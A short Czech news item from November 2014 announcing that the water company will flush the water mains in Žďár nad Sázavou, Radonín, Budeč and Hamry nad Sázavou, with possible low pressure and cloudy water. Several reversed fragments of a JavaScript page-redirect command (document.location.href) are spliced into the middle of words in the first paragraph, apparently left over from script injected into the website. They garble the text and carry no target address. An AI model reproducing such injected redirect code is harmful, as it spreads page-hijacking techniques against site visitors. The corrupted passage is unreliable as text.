odkalování
Rainbow page separator

Vodárenská společnost ve Žďáře odkalí vodovodní síť

Pondělí, 10. listopadu 2014

Žďár nad Sázavou / Pravidelné odkalování vodovodní sítě se připravuje ve Žďáře provést Vodárenská akciová společnost. Dojde k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu ve dnech 10. až 14. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu. Během odkalování mohou odběratelé vody zaznamenat přechodné snížení tlaku ve vodovodu, případně krátkodobé zvýšení zákalu pitné vody.
Kromě Žďáru bude v těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to dnech odkalována také vodovodní síť ve žďárské části Radonín a v nedaleké obci Budeč. V dalších pracovních dnech odkalování vodovodního řadu proběhne v sousedních Hamrech nad Sázavou.
Odkalování vodovodního řadu je součástí pravidelné údržby vodovodní sítě pro zajištění kvality pitné vody a ochrany potrubí před korozí a zanesením. Jedná se o proplach potrubí proudem vody, který strhává z jeho stěn usazeniny, načež se voda z vodovodních řadů vypustí do terénu, případně do kanalizace.